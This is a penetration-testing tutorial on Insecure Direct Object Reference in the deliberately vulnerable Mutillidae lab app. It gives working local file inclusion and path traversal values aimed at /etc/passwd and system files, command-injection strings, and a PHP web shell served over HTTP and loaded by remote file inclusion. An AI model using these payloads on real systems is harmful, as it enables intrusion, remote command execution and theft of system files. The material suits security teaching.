Overview
Insecure Direct Object Reference may result when the application retrieves or accesses a resource using the resource itself as the reference to lookup or identify the resource.
Examples may include passing the filename of a document to retrieve, relocating to a URL after allowing the browser to send the URL as a parameter value or including an include file based on the browser sending the include file path and name.
Video Tutorials
Discovery Methodology
For each parameter passed that identified a resource, determine if the value is the resource itself or if the application only accepts a token which is meaningless outside of that context.
For example, if the site expects an include file name to be passed, this could be a direct object reference. Alternatively if the site expects an integer which the server later maps to the include file to display, the site is not likely to be vulnerable to this issue.
Exploitation
Based on the type of resource, submit other values to the server in order to gain access or load content to which the user is not authorized.
Example: Local File Inclusion
Note the page parameter in NOWASP URLs. This parameter is the include file to load within the main frame. Since this parameter loads any file passed, attempt to pass a local file or remote file URI.
http://[PATH TO MUTILLIDAE]/index.php?page=/etc/passwd
Example: Accessing system files
Step 1: Recon: Obtain list of files
Possible Technique: Use command injection
Page: dns-lookup.php
Value (Windows): && dir /w
Value (Linux): && pwd && ls -l
Possible Technique: Use robots.txt
Possible Technique: Use directory browsing
Possible Technique: Use directory brute-forcing
Possible Technique: Guess
Step 2: Gaining Access: Retrive system files
Page: source-viewer.php
Technique: Use an interception proxy like Burp to change the value of the phpfile parameter. Use parent directory (..) to bypass jails.
Tool: Tamper Data, Paros, WebScarab, Burp
Field: phpfile
Value: <system file path>, ../../../boot.ini, ..\..\..\WINDOW\System32\drivers\etc\hosts, ../../../etc/passwd
Example: Remote File Inclusion - Web Shell
Save this web shell in a file.
<?php echo "<pre>"; echo "shell_exec ".$_REQUEST["pCommand"]."\n\n"; echo shell_exec($_REQUEST["pCommand"]); echo "</pre>"; ?>
The web shell can be served using python's built-in web server. Python SimpleHTTPServer serves any content in the current directory on the port specified
python -m SimpleHTTPServer 8888
Browse to the web shell passing in the command as parameter pCommand
http://[PATH TO MUTILLIDAE]/index.php?page=http://127.0.0.1:8888/simple-web-shell.php&pCommand=cat+/etc/passwd
Videos
Introduction to Fuzzing Web Applications with Burp-Suite Intruder Tool How to Exploit Local File Inclusion Vulnerability using Burp-Suite ISSA 2013 Web Pen-testing Workshop - Part 6 - Local/Remote File Inclusion How to Show Secret Page in Security Level 5